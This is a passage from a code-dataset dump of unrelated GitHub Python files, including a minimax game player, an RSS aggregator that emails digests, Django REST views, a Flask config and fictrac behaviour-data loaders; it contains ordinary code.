return trans[state]\n if(state.is_terminal()):\n return state.utility(player)\n val_return = float(\"-infinity\")\n action_list = state.actions()\n for i in range(0, len(action_list)):\n value = self.min_value(state.result(action_list[i]),player, a, b, trans,\n current_depth - 1)\n if value > val_return:\n val_return = value\n if val_return >= b: return val_return\n if val_return > a: a = val_return\n trans[state.result(action_list[i])] = val_return\n return val_return\n def min_value(self, state, player,a,b,trans, current_depth):\n # if terminal test is true, return utility\n # val <- positive infinity\n # for each child in Action do\n # val <- min(val, max_value(child))\n # return val\n if current_depth == 0:\n if(state.is_terminal()): return state.utility(player)\n if state in trans: return trans[state]\n return self.evaluate(state, state.to_play.color) \n if state in trans:\n return trans[state]\n if(state.is_terminal()):\n return state.utility(player)\n val_return = float(\"infinity\")\n action_list = state.actions()\n for i in range(0, len(action_list)):\n value = self.max_value(state.result(action_list[i]),player, a, b, trans,\n current_depth - 1)\n if(value < val_return):\n val_return = value\n if val_return <= a: return val_return\n if val_return < b: b = val_return\n trans[state.result(action_list[i])] = val_return\n return val_return\n\n def evaluate(self, state, color):\n chase_list = []\n for i in range(0, len(state.board)):\n for j in range(0, len(state.board[0])):\n if state.board[i][j] == color:\n chase_list.append(self.chase(i, j, state, color))\n chase_list.sort()\n #print(chase_list[len(chase_list)-1])\n #print(state.K)\n return round(chase_list[len(chase_list)-1],1)/ round(state.K, 1)\n\n def chase(self, i, j, state, color):\n return_list = []\n #left, chase right\n if j == 0 or j > 0 and state.board[i][j-1] != color:\n count = 0\n jj = j\n while jj < len(state.board[0]) and state.board[i][jj] == color:\n count = count + 1\n jj = jj + 1\n return_list.append(count)\n #right, chase left\n if j == len(state.board[0]) - 1 or j < len(state.board[0]) - 1 and state.board[i][j+1] != color:\n count = 0\n jj = j\n while jj >= 0 and state.board[i][jj] == color:\n count = count + 1\n jj = jj - 1\n return_list.append(count)\n #up, chase down\n if i == 0 or i > 0 and state.board[i-1][j] != color:\n count = 0\n ii = i\n while ii < len(state.board) and state.board[ii][j] == color:\n count = count + 1\n ii = ii + 1\n return_list.append(count)\n #down, chase up\n if i == len(state.board) - 1 or i < len(state.board) - 1 and state.board[i+1][j] != color:\n count = 0\n ii = i\n while ii >= 0 and state.board[ii][j] == color:\n count = count + 1\n ii = ii - 1\n return_list.append(count)\n #left-up, chase right-down\n if i == 0 or j == 0 or i>0 and j>0 and state.board[i-1][j-1] != color:\n count = 0\n ii = i\n jj = j\n while jj < len(state.board[0]) and ii < len(state.board) and state.board[ii][jj] == color:\n count = count + 1\n ii = ii + 1\n jj = jj + 1\n return_list.append(count) \n #right-down, chase left-up\n if j == len(state.board[0]) - 1 or i == len(state.board) - 1 or j < len(state.board[0]) - 1 and i < len(state.board) - 1 and state.board[i+1][j+1] != color:\n count = 0\n ii = i\n jj = j\n while ii >= 0 and jj >= 0 and state.board[ii][jj] == color:\n count = count + 1\n ii = ii - 1\n jj = jj - 1\n return_list.append(count)\n #right-up, chase left-down\n if i == 0 or j == len(state.board[0]) - 1 or i>0 and j < len(state.board[0]) - 1 and state.board[i-1][j+1] != color:\n count = 0\n 
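# count the run from (i, j) downward-left (ii grows, jj shrinks) until the color run ends\n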
ii = i\n jj = j\n while jj >= 0 and ii < len(state.board) and state.board[ii][jj] == color:\n count = count + 1\n ii = ii + 1\n jj = jj - 1\n return_list.append(count)\n #left-down, chase right-up\n if j == 0 or i == len(state.board) - 1 or j>0 and i < len(state.board) - 1 and state.board[i+1][j-1] != color:\n count = 0\n ii = i\n jj = j\n while ii >= 0 and jj < len(state.board[0]) and state.board[ii][jj] == color:\n count = count + 1\n ii = ii - 1\n jj = jj + 1\n return_list.append(count)\n return_list.sort()\n return return_list[len(return_list)-1]\n\n","repo_name":"GloriaGreatGreat/CSE150AI","sub_path":"assignment2/solutions/save/p4_custom_player_save.py","file_name":"p4_custom_player_save.py","file_ext":"py","file_size_in_byte":8233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40998726175","text":"from selenium import webdriver\n\n\n# Returns the commands from the post\n\ndef Return_Commands(driver):\n driver.implicitly_wait(10)\n post_box = driver.find_element_by_id(\"bodyDisplay\")\n mention = post_box.find_element_by_xpath(\".//a[@href='/t5/user/viewprofilepage/user-id/4013800']\")\n driver.execute_script(\"arguments[0].scrollIntoView();\", mention)\n text = mention.find_element_by_xpath(\".//..\").text\n\n full_command = text.removeprefix('@EddyK_Bot') # Later change to the bot's name\n\n return full_command","repo_name":"Eddy-M-K/HP-Support-Community-Bot","sub_path":"Return_Commands.py","file_name":"Return_Commands.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14146551601","text":"class Power():\n def check(N,P): # called as Power.check(N, P), so it takes no self\n N = int(N)\n P = int(P)\n \n if P == 1:\n return N\n \n if P != 1:\n return (N*Power.check(N,P-1))\n\nT = Power\narr = input().split(\",\")\nN = arr[0]\nP = arr[1]\ntest = T.check(N,P)\nprint(\"{0}^{1} = {2}\".format(N,P,test))\n","repo_name":"Abhijit2123/Leetcode","sub_path":"power_using_recurssion.py","file_name":"power_using_recurssion.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35350269473","text":"\n\nfrom pathlib import Path\n\nfrom AlgorithmicStrategy import (\n Standarder\n)\n\nraw_data_folder = Path.cwd() / \"DATA/ML/RAW\"\nnorm_data_folder = Path.cwd() / \"DATA/ML/NORM\"\nlabel_data_folder = Path.cwd() / \"DATA/ML/LABEL\"\n\nif not norm_data_folder.exists():\n norm_data_folder.mkdir(parents=True, exist_ok=True)\n\nstandard = Standarder(file_folder=raw_data_folder, train=True)\nstandard.fresh_files()\nstandard.read_files()\nstandard.fit_transform_for_files(output=norm_data_folder)\n\n","repo_name":"Me2yhm/Algorithmic-Trading","sub_path":"AlgorithmicStrategy/TWAP_VWAP/norm_generate.py","file_name":"norm_generate.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"30497541747","text":"import feedparser\nimport time\nimport os\nimport re\nimport pytz\nfrom datetime import datetime\nimport yagmail\nimport requests\nimport markdown\nimport json\nimport shutil\nfrom urllib.parse import urlparse\nfrom multiprocessing import Pool, Manager\n\n\n\ndef get_rss_info(feed_url, index, rss_info_list):\n result = {\"result\": []}\n request_success = False\n # If the request fails, retry; three attempts in total\n for i in range(3):\n if(request_success == False):\n try:\n headers = {\n # Set a User-Agent header (dress the wolf in sheep's clothing)\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\",\n \"Content-Encoding\": \"gzip\"\n }\n # the three attempts use 8, 16 and 24 second timeouts respectively\n feed_url_content = requests.get(feed_url, timeout= (i+1)*8 ,headers = headers).content\n feed = feedparser.parse(feed_url_content)\n feed_entries = feed[\"entries\"]\n feed_entries_length = len(feed_entries)\n print(\"==feed_url=>>\", feed_url, \"==len=>>\", feed_entries_length)\n # note: this slice drops the feed's last entry\n for entrie in feed_entries[0: feed_entries_length-1]:\n title = entrie[\"title\"]\n link = entrie[\"link\"]\n date = time.strftime(\"%Y-%m-%d\", entrie[\"published_parsed\"])\n\n title = title.replace(\"\\n\", \"\")\n title = title.replace(\"\\r\", \"\")\n\n result[\"result\"].append({\n \"title\": title,\n \"link\": link,\n \"date\": date\n })\n request_success = True\n except Exception as e:\n print(feed_url + \" attempt \" + str(i) + \" failed ==>>\", e)\n pass\n else:\n pass\n\n rss_info_list[index] = result[\"result\"]\n print(\"Fetched ==>>\", feed_url, \"<<<===\", index, result[\"result\"])\n # Number of feeds still pending\n remaining_amount = 0\n\n for tmp_rss_info_atom in rss_info_list:\n if(isinstance(tmp_rss_info_atom, int)):\n remaining_amount = remaining_amount + 1\n \n print(\"Progress | remaining:\", remaining_amount, \"done ==>>\", len(rss_info_list)-remaining_amount)\n return result[\"result\"]\n \n\n\ndef send_mail(email, title, contents):\n # Check whether secret.json exists\n user = \"\"\n password = \"\"\n host = \"\"\n try:\n if(os.environ[\"USER\"]):\n user = os.environ[\"USER\"]\n if(os.environ[\"PASSWORD\"]):\n password = os.environ[\"PASSWORD\"]\n if(os.environ[\"HOST\"]):\n host = os.environ[\"HOST\"]\n except:\n print(\"Could not read the GitHub secrets configuration, falling back to local variables\")\n if(os.path.exists(os.path.join(os.getcwd(),\"secret.json\"))):\n with open(os.path.join(os.getcwd(),\"secret.json\"),'r') as load_f:\n load_dict = json.load(load_f)\n user = load_dict[\"user\"]\n password = load_dict[\"password\"]\n host = load_dict[\"host\"]\n # print(load_dict)\n else:\n print(\"Could not obtain sender credentials\")\n \n # Connect to the mail server\n # yag = yagmail.SMTP(user=user, password=password, host=host)\n yag = yagmail.SMTP(user = user, password = password, host=host)\n # Send the mail\n yag.send(email, title, contents)\n\ndef replace_readme():\n new_edit_readme_md = [\"\", \"\"]\n current_date_news_index = [\"\"]\n\n\n \n # Read EditREADME.md\n print(\"replace_readme\")\n new_num = 0\n with open(os.path.join(os.getcwd(),\"EditREADME.md\"),'r') as load_f:\n edit_readme_md = load_f.read();\n\n\n\n new_edit_readme_md[0] = edit_readme_md\n before_info_list = re.findall(r'\\{\\{latest_content\\}\\}.*\\[订阅地址\\]\\(.*\\)' ,edit_readme_md);\n # Fill in the RSS feed count\n new_edit_readme_md[0] = new_edit_readme_md[0].replace(\"{{rss_num}}\", str(len(before_info_list)))\n # Fill in the update timestamp\n ga_rss_datetime = datetime.fromtimestamp(int(time.time()),pytz.timezone('Asia/Shanghai')).strftime('%Y-%m-%d %H:%M:%S')\n new_edit_readme_md[0] = new_edit_readme_md[0].replace(\"{{ga_rss_datetime}}\", str(ga_rss_datetime))\n\n # Fetch the data with a process pool, producing rss_info_list\n before_info_list_len = len(before_info_list)\n rss_info_list = Manager().list(range(before_info_list_len))\n print('Initialized ==>', rss_info_list)\n\n \n\n # Create a pool of at most 8 worker processes\n po = Pool(8)\n\n for index, before_info in enumerate(before_info_list):\n # Extract the link\n link = re.findall(r'\\[订阅地址\\]\\((.*)\\)', before_info)[0]\n po.apply_async(get_rss_info,(link, index, rss_info_list))\n\n\n # Close the pool: accept no new tasks and start working\n po.close()\n\n # The main process waits for all workers to finish\n po.join()\n print(\"----done----\", rss_info_list)\n\n\n for index, before_info in enumerate(before_info_list):\n # Extract the link\n link = re.findall(r'\\[订阅地址\\]\\((.*)\\)', before_info)[0]\n # Build the hyperlink\n rss_info = rss_info_list[index]\n latest_content = \"\"\n parse_result = urlparse(link)\n scheme_netloc_url = str(parse_result.scheme)+\"://\"+str(parse_result.netloc)\n latest_content = \"[暂无法通过爬虫获取信息, 点击进入源网站主页](\"+ scheme_netloc_url +\")\"\n\n # Add to the index\n try:\n for rss_info_atom in rss_info:\n if (rss_info_atom[\"date\"] == datetime.today().strftime(\"%Y-%m-%d\")):\n new_num = new_num + 1\n if (new_num % 2) == 0:\n current_date_news_index[0] = current_date_news_index[0] + \"\"\n else:\n current_date_news_index[0] = current_date_news_index[0] + \"\"\n\n except:\n print(\"An exception occurred\")\n \n\n \n if(len(rss_info) > 0):\n rss_info[0][\"title\"] = rss_info[0][\"title\"].replace(\"|\", \"\\|\")\n rss_info[0][\"title\"] = rss_info[0][\"title\"].replace(\"[\", \"\\[\")\n rss_info[0][\"title\"] = rss_info[0][\"title\"].replace(\"]\", \"\\]\")\n\n latest_content = \"[\" + \"‣ \" + rss_info[0][\"title\"] + ( \" 🌈 \" + rss_info[0][\"date\"] if (rss_info[0][\"date\"] == datetime.today().strftime(\"%Y-%m-%d\")) else \" \\| \" + rss_info[0][\"date\"] ) +\"](\" + rss_info[0][\"link\"] +\")\" \n\n if(len(rss_info) > 1):\n rss_info[1][\"title\"] = rss_info[1][\"title\"].replace(\"|\", \"\\|\")\n rss_info[1][\"title\"] = rss_info[1][\"title\"].replace(\"[\", \"\\[\")\n rss_info[1][\"title\"] = rss_info[1][\"title\"].replace(\"]\", \"\\]\")\n\n latest_content = latest_content + \"<br>[\" + \"‣ \" + rss_info[1][\"title\"] + ( \" 🌈 \" + rss_info[0][\"date\"] if (rss_info[0][\"date\"] == datetime.today().strftime(\"%Y-%m-%d\")) else \" \\| \" + rss_info[0][\"date\"] ) +\"](\" + rss_info[1][\"link\"] +\")\"\n\n # Build after_info\n after_info = before_info.replace(\"{{latest_content}}\", latest_content)\n print(\"====latest_content==>\", latest_content)\n # Replace the content in edit_readme_md\n new_edit_readme_md[0] = new_edit_readme_md[0].replace(before_info, after_info)\n \n # Substitute the index into EditREADME\n new_edit_readme_md[0] = new_edit_readme_md[0].replace(\"{{news}}\", current_date_news_index[0])\n # Substitute the new-article count into EditREADME\n new_edit_readme_md[0] = new_edit_readme_md[0].replace(\"{{new_num}}\", str(new_num))\n # Add the CDN prefix\n new_edit_readme_md[0] = new_edit_readme_md[0].replace(\"./_media\", \"https://cdn.jsdelivr.net/gh/zhaoolee/garss/_media\")\n \n # Write the new content into README.md\n with open(os.path.join(os.getcwd(),\"README.md\"),'w') as load_f:\n load_f.write(new_edit_readme_md[0])\n \n\n # these markers must match the literal text in EditREADME.md\n mail_re = r'邮件内容区开始>([.\\S\\s]*)<邮件内容区结束'\n reResult = re.findall(mail_re, new_edit_readme_md[0])\n new_edit_readme_md[1] = reResult\n\n \n return new_edit_readme_md\n\n# Copy README.md into docs\n\ndef cp_readme_md_to_docs():\n shutil.copyfile(os.path.join(os.getcwd(),\"README.md\"), os.path.join(os.getcwd(), \"docs\",\"README.md\"))\n \ndef cp_media_to_docs():\n if os.path.exists(os.path.join(os.getcwd(), \"docs\",\"_media\")):\n shutil.rmtree(os.path.join(os.getcwd(), \"docs\",\"_media\"))\t\n shutil.copytree(os.path.join(os.getcwd(),\"_media\"), os.path.join(os.getcwd(), \"docs\",\"_media\"))\n\ndef get_email_list():\n email_list = []\n with open(os.path.join(os.getcwd(),\"tasks.json\"),'r') as load_f:\n load_dic = json.load(load_f)\n for task in load_dic[\"tasks\"]:\n email_list.append(task[\"email\"])\n return email_list\n\n# Create the OPML subscription file\n\ndef create_opml():\n\n result = \"\";\n result_v1 = \"\";\n\n # \n\n with open(os.path.join(os.getcwd(),\"EditREADME.md\"),'r') as load_f:\n edit_readme_md = load_f.read();\n\n ## Fill the parsed info into opml_info_text_list\n opml_info_text_list = re.findall(r'.*\\{\\{latest_content\\}\\}.*\\[订阅地址\\]\\(.*\\).*' ,edit_readme_md);\n\n for opml_info_text in opml_info_text_list:\n\n\n # print('==', opml_info_text)\n\n opml_info_text_format_data = re.match(r'\\|(.*)\\|(.*)\\|(.*)\\|(.*)\\|.*\\[订阅地址\\]\\((.*)\\).*\\|',opml_info_text)\n\n # print(\"data==>>\", opml_info_text_format_data)\n\n # print(\"full info\", opml_info_text_format_data[0].strip())\n # print(\"number ==>>\", opml_info_text_format_data[1].strip())\n # print(\"text==>>\", opml_info_text_format_data[2].strip())\n # print(\"description==>>\", opml_info_text_format_data[3].strip())\n # print(\"data004==>>\", opml_info_text_format_data[4].strip())\n print('##',opml_info_text_format_data[2].strip())\n print(opml_info_text_format_data[3].strip())\n print(opml_info_text_format_data[5].strip())\n \n\n opml_info = {}\n opml_info[\"text\"] = opml_info_text_format_data[2].strip()\n opml_info[\"description\"] = opml_info_text_format_data[3].strip()\n opml_info[\"htmlUrl\"] = opml_info_text_format_data[5].strip()\n opml_info[\"title\"] = opml_info_text_format_data[2].strip()\n opml_info[\"xmlUrl\"] = opml_info_text_format_data[5].strip()\n\n # print('opml_info==>>', opml_info);\n \n\n\n # OPML <outline> entry template, filled from opml_info below\n opml_info_text = '<outline text=\"{text}\" title=\"{title}\" description=\"{description}\" type=\"rss\" xmlUrl=\"{xmlUrl}\" htmlUrl=\"{htmlUrl}\"/>'\n\n opml_info_text_v1 = ' '\n\n opml_info_text = opml_info_text.format(\n text=opml_info[\"text\"], \n description=opml_info[\"description\"], \n htmlUrl = opml_info[\"htmlUrl\"],\n title=opml_info[\"title\"],\n xmlUrl=opml_info[\"xmlUrl\"]\n )\n\n opml_info_text_v1 = 
opml_info_text_v1.format(\n htmlUrl = opml_info[\"htmlUrl\"],\n title=opml_info[\"title\"],\n xmlUrl=opml_info[\"xmlUrl\"]\n )\n\n result = result + opml_info_text + \"\\n\"\n\n result_v1 = result_v1 + opml_info_text_v1 + \"\\n\"\n \n zhaoolee_github_garss_subscription_list = \"\";\n with open(os.path.join(os.getcwd(),\"rss-template-v2.txt\"),'r') as load_f:\n zhaoolee_github_garss_subscription_list_template = load_f.read();\n GMT_FORMAT = '%a, %d %b %Y %H:%M:%S GMT'\n date_created = datetime.utcnow().strftime(GMT_FORMAT);\n date_modified = datetime.utcnow().strftime(GMT_FORMAT);\n zhaoolee_github_garss_subscription_list = zhaoolee_github_garss_subscription_list_template.format(result=result, date_created=date_created, date_modified=date_modified);\n # print(zhaoolee_github_garss_subscription_list);\n\n # 将内容写入\n with open(os.path.join(os.getcwd(),\"zhaoolee_github_garss_subscription_list_v2.opml\"),'w') as load_f:\n load_f.write(zhaoolee_github_garss_subscription_list)\n\n zhaoolee_github_garss_subscription_list_v1 = \"\"\n with open(os.path.join(os.getcwd(),\"rss-template-v1.txt\"),'r') as load_f:\n zhaoolee_github_garss_subscription_list_template = load_f.read();\n zhaoolee_github_garss_subscription_list_v1 = zhaoolee_github_garss_subscription_list_template.format(result=result_v1);\n # print(zhaoolee_github_garss_subscription_list_v1);\n\n # 将内容写入\n with open(os.path.join(os.getcwd(),\"zhaoolee_github_garss_subscription_list_v1.opml\"),'w') as load_f:\n load_f.write(zhaoolee_github_garss_subscription_list_v1)\n\n\n\n\n \n # print(result)\n\ndef create_json():\n result = {\"garssInfo\": []}\n with open(os.path.join(os.getcwd(),\"EditREADME.md\"),'r') as load_f:\n edit_readme_md = load_f.read();\n ## 将信息填充到opml_info_list\n opml_info_text_list = re.findall(r'.*\\{\\{latest_content\\}\\}.*\\[订阅地址\\]\\(.*\\).*' ,edit_readme_md);\n for opml_info_text in opml_info_text_list:\n opml_info_text_format_data = re.match(r'\\|(.*)\\|(.*)\\|(.*)\\|(.*)\\|.*\\[订阅地址\\]\\((.*)\\).*\\|',opml_info_text)\n opml_info = {}\n opml_info[\"description\"] = opml_info_text_format_data[3].strip()\n opml_info[\"title\"] = opml_info_text_format_data[2].strip()\n opml_info[\"xmlUrl\"] = opml_info_text_format_data[5].strip()\n result[\"garssInfo\"].append(opml_info)\n with open(\"./garssInfo.json\",\"w\", encoding=\"utf-8\") as f:\n json.dump(result, f, ensure_ascii=False, indent=4)\n\ndef main():\n create_json()\n create_opml()\n readme_md = replace_readme()\n content = markdown.markdown(readme_md[0], extensions=['tables', 'fenced_code'])\n cp_readme_md_to_docs()\n cp_media_to_docs()\n email_list = get_email_list()\n\n mail_re = r'邮件内容区开始>([.\\S\\s]*)<邮件内容区结束'\n reResult = re.findall(mail_re, readme_md[0])\n\n try:\n send_mail(email_list, \"嘎!RSS订阅\", reResult)\n except Exception as e:\n print(\"==邮件设信息置错误===》》\", e)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"zhaoolee/garss","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15381,"program_lang":"python","lang":"en","doc_type":"code","stars":969,"dataset":"github-code","pt":"21"} +{"seq_id":"30570233796","text":"\"\"\" Command line tools for the API server \"\"\"\nfrom argparse import ArgumentParser\n\nimport dpath\nfrom humanfriendly import parse_timespan\n\n\ndef setup():\n from apiserver.database import db\n db.initialize()\n\n\ndef gen_token(args):\n from apiserver.bll.auth import AuthBLL\n resp = AuthBLL.get_token_for_user(args.user_id, args.company_id, parse_timespan(args.expiration))\n print('Token:\\n%s' % 
resp.token)\n\n\ndef safe_get(obj, glob, default=None, separator=\"/\"):\n try:\n return dpath.get(obj, glob, separator=separator)\n except KeyError:\n return default\n\n\nif __name__ == '__main__':\n top_parser = ArgumentParser(__doc__)\n\n subparsers = top_parser.add_subparsers(title='Sections')\n\n token = subparsers.add_parser('token')\n token_commands = token.add_subparsers(title='Commands')\n token_create = token_commands.add_parser('generate', description='Generate a new token')\n token_create.add_argument('--user-id', '-u', help='User ID', required=True)\n token_create.add_argument('--company-id', '-c', help='Company ID', required=True)\n token_create.add_argument('--expiration', '-exp',\n help=\"Token expiration (time span, shorthand suffixes are supported, default 1m)\",\n default=parse_timespan('1m'))\n token_create.set_defaults(_func=gen_token)\n\n args = top_parser.parse_args()\n if args._func:\n setup()\n args._func(args)\n","repo_name":"allegroai/clearml-server","sub_path":"apiserver/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","stars":334,"dataset":"github-code","pt":"21"} +{"seq_id":"28934016996","text":"from flask import Flask\nfrom app.database import connect_db\nimport os\n\nSECRET_KEY = os.environ.get('SECRET_KEY', 'j8k9z411b')\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ.get(\n 'DATABASE_URL', 'postgres:///ffl-trades-db')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SECRET_KEY'] = SECRET_KEY\n\nconnect_db(app)\n","repo_name":"leshawn-rice/ffl-trade-tips","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13613754141","text":"# Suponiendo que se han ejecutado las siguientes sentencias de asignación:\nancho = 17\nalto = 12.0\n# Para cada una de las expresiones siguientes, intenta adivinar el valor de la expresión y su tipo sin ejecutarlas en el intérprete:\n# 1. ancho / 2\n# 2. ancho // 2\n# 3. alto / 3\n# 4. 1 + 2 * 5\n\n\n# 1. El valor es 8.5 y es float.\n# 2. El valor es 8 y es int.\n# 3. El valor es 4.0 y es float.\n# 4. 
El valor es 11 y es int.\n\ndef primeraexp(ancho):\n resultado1 = ancho / 2\n return str(resultado1)\n\ndef segundaexp(ancho):\n resultado2 = ancho // 2\n return str(resultado2)\n\ndef tercerexp(alto):\n resultado3 = alto / 3\n return str(resultado3)\n\nif __name__ == \"__main__\":\n print(\"El primer resultado es \" + primeraexp(ancho))\n print(\"El segundo resultado es \"+ segundaexp(ancho))\n print(\"El tercer resultado es \"+ tercerexp(alto))\n","repo_name":"IES-Rafael-Alberti/2324-u1-primeros-programas-FcoJose2","sub_path":"src/Ejercicio2_3.py","file_name":"Ejercicio2_3.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"373017234","text":"from django.shortcuts import render\nfrom rest_framework.generics import (\n ListAPIView, RetrieveAPIView, DestroyAPIView, UpdateAPIView, CreateAPIView,\n RetrieveUpdateAPIView\n)\nfrom post.models import Post\nfrom .serializers import PostSerializer, PostCreateSerializer, PostUpdateSerializer\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.filters import SearchFilter, OrderingFilter\nfrom rest_framework.mixins import ListModelMixin\nfrom rest_framework.throttling import ScopedRateThrottle\nfrom .paginations import PostPagination\n#custom permission\nfrom .permissions import isOwnerOrSuperUser\n\n\nclass PostListAPIView(ListAPIView):\n # queryset = Post.objects.all() # tumunu cekiyor\n serializer_class = PostSerializer\n #arama SearchFilter and siralama OrderingFilter\n filter_backends = [SearchFilter, OrderingFilter]\n search_fields = ['title', 'content']\n # SearchFilter /api/post/list/?search=es\n # OrderingFilter /api/post/list/?search=es&ordering=title (ordering=-title : ters siralama | reverse orderings)\n throttle_classes = [ScopedRateThrottle]\n throttle_scope = 'post'\n \n # pagination\n pagination_class = PostPagination\n\n # filtreleme\n def get_queryset(self):\n queryset = Post.objects.filter(draft=False)\n return queryset\n #__note: once data filtrelenip gonderiliyor ve search yapildiginda bu filtre dikkate aliniyor\n \n\n\nclass PostDetailAPIView(RetrieveAPIView):\n queryset = Post.objects.all() # ?- detail de neden .all() diyoruz?\n serializer_class = PostSerializer # ?- detail post serializer tanimlanabilir mi?\n lookup_field = 'slug'\n # lookup_field = 'pk'\n # note: lookup_field hic yazilmazsa default ta pk yani id ile calisiyor. 
url kismina detail/ seklinde yazilmali\n\n\nclass PostUpdateAPIView(RetrieveUpdateAPIView):\n queryset = Post.objects.all()\n serializer_class = PostUpdateSerializer\n lookup_field = 'slug'\n permission_classes = [isOwnerOrSuperUser]\n\n def perform_update(self, serializer):\n serializer.save(modified_by_user=self.request.user)\n # update islemi yapan user'i eklemak icin\n\n\nclass PostDeleteAPIView(DestroyAPIView):\n queryset = Post.objects.all()\n serializer_class = PostSerializer\n lookup_field = 'slug'\n permission_classes = [IsAuthenticated, isOwnerOrSuperUser]\n\n\nclass PostCreateAPIView(CreateAPIView, ListModelMixin):\n queryset = Post.objects.all()\n serializer_class = PostCreateSerializer\n permission_classes = [IsAuthenticated]\n\n # mixin usage: boylece /api/post/create/ url'i Allow: GET 'e izin veriyor ve datalari da gonderebiliyoruz\n def get(self, request, *args, **kwargs):\n return self.list(request, *args, **kwargs)\n\n def perform_create(self, serializer):\n serializer.save(user=self.request.user)\n","repo_name":"m-gunes/django-rest-framework","sub_path":"post/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6698076101","text":"import numpy as np\nimport sys\nimport os\nimport scipy\nimport scipy.signal\nimport pandas as pd\nfrom scipy.interpolate import interp1d\n\ndef load_fictrac(directory, file='fictrac.dat'):\n \"\"\" Loads fictrac data from .dat file that fictrac outputs.\n\n To-do: change units based on diameter of ball etc.\n For speed sanity check, instead remove bad frames so we don't have to throw out whole trial.\n\n Parameters\n ----------\n directory: string of full path to file\n file: string of file name\n\n Returns\n -------\n fictrac_data: pandas dataframe of all parameters saved by fictrac \"\"\"\n\n for item in os.listdir(directory):\n if '.dat' in item:\n file = item\n\n with open(os.path.join(directory, file),'r') as f:\n df = pd.DataFrame(l.rstrip().split() for l in f)\n\n # Name columns\n df = df.rename(index=str, columns={0: 'frameCounter',\n 1: 'dRotCamX',\n 2: 'dRotCamY',\n 3: 'dRotCamZ',\n 4: 'dRotScore',\n 5: 'dRotLabX',\n 6: 'dRotLabY',\n 7: 'dRotLabZ',\n 8: 'AbsRotCamX',\n 9: 'AbsRotCamY',\n 10: 'AbsRotCamZ',\n 11: 'AbsRotLabX',\n 12: 'AbsRotLabY',\n 13: 'AbsRotLabZ',\n 14: 'positionX',\n 15: 'positionY',\n 16: 'heading',\n 17: 'runningDir',\n 18: 'speed',\n 19: 'integratedX',\n 20: 'integratedY',\n 21: 'timeStamp',\n 22: 'sequence'})\n\n # Remove commas\n for column in df.columns.values[:-1]:\n df[column] = [float(x[:-1]) for x in df[column]]\n\n fictrac_data = df\n \n # sanity check for extremely high speed (fictrac failure)\n speed = np.asarray(fictrac_data['speed'])\n max_speed = np.max(speed)\n if max_speed > 10:\n raise Exception('Fictrac ball tracking failed (reporting impossibly high speed).')\n return fictrac_data\n\ndef interpolate_fictrac(fictrac, timestamps, fps, dur, behavior='speed',sigma=3,sign=None):\n \"\"\" Interpolate fictrac.\n\n Parameters\n ----------\n fictrac: fictrac pandas dataframe.\n timestamps: [t,z] numpy array of imaging timestamps (to interpolate to).\n fps: camera frame rate (Hz)\n dur: int, duration of fictrac recording (in ms)\n behavior: column of dataframe to use\n sigma: for smoothing\n\n Returns\n -------\n fictrac_interp: [t,z] numpy array of fictrac interpolated to timestamps\n\n \"\"\"\n camera_rate = 1/fps * 1000 # camera frame rate in ms\n raw_fictrac_times = 
np.arange(0,dur,camera_rate)\n \n # Cut off any extra frames (only happened with brain 4)\n fictrac = fictrac[:90000]\n \n if behavior == 'my_speed':\n dx = np.asarray(fictrac['dRotLabX'])\n dy = np.asarray(fictrac['dRotLabY'])\n dx = scipy.ndimage.filters.gaussian_filter(dx,sigma=3)\n dy = scipy.ndimage.filters.gaussian_filter(dy,sigma=3)\n fictrac_smoothed = np.sqrt(dx*dx + dy*dy)\n elif behavior == 'speed_all_3':\n dx = np.asarray(fictrac['dRotLabX'])\n dy = np.asarray(fictrac['dRotLabY'])\n dz = np.asarray(fictrac['dRotLabZ'])\n dx = scipy.ndimage.filters.gaussian_filter(dx,sigma=3)\n dy = scipy.ndimage.filters.gaussian_filter(dy,sigma=3)\n dz = scipy.ndimage.filters.gaussian_filter(dz,sigma=3)\n fictrac_smoothed = np.sqrt(dx*dx + dy*dy + dz*dz)\n else:\n fictrac_smoothed = scipy.ndimage.filters.gaussian_filter(np.asarray(fictrac[behavior]),sigma=sigma)\n\n if sign is not None and sign == 'abs':\n fictrac_smoothed = np.abs(fictrac_smoothed)\n elif sign is not None and sign == 'plus':\n fictrac_smoothed = np.clip(fictrac_smoothed,a_min=0,a_max=None)\n elif sign is not None and sign == 'minus':\n fictrac_smoothed = np.clip(fictrac_smoothed,a_min=None,a_max=0)\n elif sign is not None and sign == 'df':\n fictrac_smoothed = np.append(np.diff(fictrac_smoothed),0)\n elif sign is not None and sign == 'df_abs':\n fictrac_smoothed = np.abs(np.append(np.diff(fictrac_smoothed),0))\n\n # Interpolate\n # Warning: interp1d set to fill in out of bounds times\n fictrac_interp_temp = interp1d(raw_fictrac_times, fictrac_smoothed, bounds_error = False)\n fictrac_interp = fictrac_interp_temp(timestamps)\n \n # Replace Nans with zeros (for later code)\n np.nan_to_num(fictrac_interp, copy=False);\n \n return fictrac_interp\n\ndef smooth_and_interp_fictrac(fictrac, fps, resolution, expt_len, behavior, timestamps=None, 